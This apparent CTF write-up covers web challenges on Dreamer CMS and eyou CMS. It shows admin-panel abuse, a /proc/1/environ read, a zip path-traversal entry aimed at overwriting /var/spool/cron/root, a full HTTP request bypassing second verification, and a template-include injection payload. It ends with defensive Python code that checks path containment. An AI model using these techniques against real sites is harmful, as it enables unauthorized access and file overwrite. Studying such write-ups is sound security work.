Four web challenges, solved three of them, I am far too weak QAQ

Web

Click to Sign In


Clicked 10 times in a row, then edited the counter so that it triggers 1000 times.


One more click and the flag appears.

Dreamer

Reference:

https://forum.butian.net/share/2183


The usage instructions give the default admin password.

Log in to the admin backend.


Arbitrary file read. Go back to the home page.


Visit the column that was just enabled.


Dreamer_revenge

First get into the admin backend.

Following the "template management in the backend allows arbitrary edits, leading to GetShell" entry in https://forum.butian.net/share/2183


Reading the environment variables from /proc/1/environ gives the flag as an unintended solution (it should be unintended, I think).


Tried getting a reverse shell through a cron job, which failed.

Changed the file name inside the archive to

../../../../../../../../../../var/spool/cron/root

The overwrite succeeded, but the cron service was not running, so it could not be used.

I heard the intended solution is to overwrite rt.jar... didn't try it.

Post-contest reproduction: Eyou

eyou cms 0day

Log in to the admin backend at http://eci-2zeacv6uv18sp6ynvjkd.cloudeci1.ichunqiu.com/login.php?s=Admin/login ; the password is given in the challenge description.


```http
POST http://eci-2zeacv6uv18sp6ynvjkd.cloudeci1.ichunqiu.com/login.php?m=admin&c=Security&a=second_verify_add&_ajax=1&lang=cn HTTP/1.1
Host: eci-2zeacv6uv18sp6ynvjkd.cloudeci1.ichunqiu.com
Content-Length: 15
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://eci-2zeacv6uv18sp6ynvjkd.cloudeci1.ichunqiu.com
Referer: http://eci-2zeacv6uv18sp6ynvjkd.cloudeci1.ichunqiu.com/login.php?m=admin&c=Filemanager&a=index&lang=cn
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=f7ea191fec68bdd02d8c0291e6626ef2; admin_lang=cn; home_lang=cn; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A%221%22%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; admin-treeClicked-Arr=%5B%5D; admin-arctreeClicked-Arr=%5B%5D; ENV_GOBACK_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArticle%26a%3Dindex%26typeid%3D68%26lang%3Dcn; ENV_LIST_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArticle%26a%3Dindex%26lang%3Dcn; workspaceParam=switch_map%7CIndex
Connection: close

answer=123456&ack=0
```

Response:

```http
HTTP/1.1 200 OK
Connection: close
Content-Length: 125
Cache-Control: private
Content-Type: application/json; charset=utf-8
Date: Wed, 19 Apr 2023 08:51:36 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: home_lang=cn; path=/
Set-Cookie: ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A%221%22%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; path=/
X-Powered-By: PHP/7.4.21

{"code":1,"msg":"操作成功!","data":"","url":"\/login.php?m=admin&c=Security&a=index&lang=cn","wait":1,"target":"_self"}
```

The second verification step succeeds.

Reconnaissance suggested a possible template injection in \think\Template::parse.


When the include tag is used, the engine warns that the file does not exist, and the file name part is controllable in \think\Template::parseTemplateName.


Here the file name can be given as a variable; after local debugging the payload is {eyou:include file="$global.web_logo"/}


Append it to the end of the template.

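Both the archive trick in the Dreamer_revenge section (an entry named `../../../../../../../../../../var/spool/cron/root` that lands outside the extraction directory) and the include tag here (a file name that carries a template variable and is resolved without being pinned to the template root) are the same class of defect: a path built from user-influenced data is never checked for containment. The following Python is an added example of the defender-side check, not code from eyou CMS, the Dreamer challenge or the writeup author; the function names, the sample archive and the rejection rules for include names are assumptions made for the illustration.

```python
"""
Path-containment checks for the two weaknesses discussed above: archive entries
that climb out of the extraction directory, and template include names that carry
variable syntax or traverse outside the template root.  Example code, constructed
for this writeup; it does not reflect how eyou CMS or ThinkPHP resolve paths.
"""
import io
import os
import posixpath
import zipfile


def is_contained(base_dir: str, candidate: str) -> bool:
    """True if `candidate`, joined onto `base_dir` and fully resolved, stays inside it."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, candidate))
    return target == base or target.startswith(base + os.sep)


def unsafe_archive_entries(zip_bytes: bytes, dest_dir: str) -> list:
    """Return the entry names that would escape dest_dir if the zip were extracted.

    Inspect before extracting: an absolute name or a name whose resolved path leaves
    dest_dir is rejected, so a crafted name can never overwrite a system file.
    """
    bad = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            if name.startswith(("/", "\\")) or not is_contained(dest_dir, name):
                bad.append(name)
    return bad


def resolve_template_include(template_root: str, name: str):
    """Return the normalized include name if it is safe to load, else None.

    Rejects names containing template-variable syntax ($, { or }), backslashes,
    anything that is not a .htm/.html file, and anything that resolves outside
    template_root.  The allowed extensions are an assumption of this example.
    """
    if any(ch in name for ch in "${}\\"):
        return None
    if not (name.endswith(".htm") or name.endswith(".html")):
        return None
    if not is_contained(template_root, name):
        return None
    return posixpath.normpath(name)


def build_sample_zip() -> bytes:
    """Constructed sample archive: one benign entry and one traversal entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("theme/index.htm", "<html></html>")
        zf.writestr("../../../../../../../../../../var/spool/cron/root",
                    "# constructed placeholder body\n")
    return buf.getvalue()


if __name__ == "__main__":
    print("unsafe entries:", unsafe_archive_entries(build_sample_zip(), "/tmp/extract"))
    for candidate in ("header.htm", "sub/../header.htm", "$global.web_logo",
                      "../../etc/passwd", "{eyou:include file=\"x\"/}"):
        print(repr(candidate), "->", resolve_template_include("/tmp/tpl", candidate))
```

The archive check is deliberately run over `infolist()` before any extraction, so a traversal name is refused rather than relied on to be sanitized by the extractor; the include resolver rejects variable syntax outright because a file name that is only known at render time cannot be validated against the template root in advance.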
